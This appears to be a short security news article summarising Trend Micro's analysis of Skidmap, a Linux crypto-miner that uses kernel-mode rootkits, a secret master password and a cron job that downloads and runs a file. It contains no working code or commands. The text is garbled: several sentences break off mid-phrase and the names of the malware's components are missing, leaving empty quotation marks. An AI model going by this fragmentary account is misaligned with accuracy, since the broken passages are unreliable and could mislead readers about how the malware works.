This malware outstands similar miners because of the way it loads malicious kernel modules to evade the detection.
The crypto-miner set up a secret master password that uses to access any user account on the system.
“These kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system.” states the analysis published by TrendMicro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or administrative access to the system.”
Experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same that provided the attackers with root or administrative access to the system.
The infection chain sees the Skidmap miner installing
“Besides the backdoor access, Skidmap also creates another way for its operators
The main binary checks whether the system runs on Debian or RHEL/CentOS, then drops the miner and other for the specific Linux distro.
Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they continue to run. Samples of these components are:
A fake “” binary that replaces the original, once executed it will randomly set up a malicious cron job to download and execute a file.
Another component is “
Trend Micro also described the “
The last component is “
(SecurityAffairs – Skidmap miner, Linux)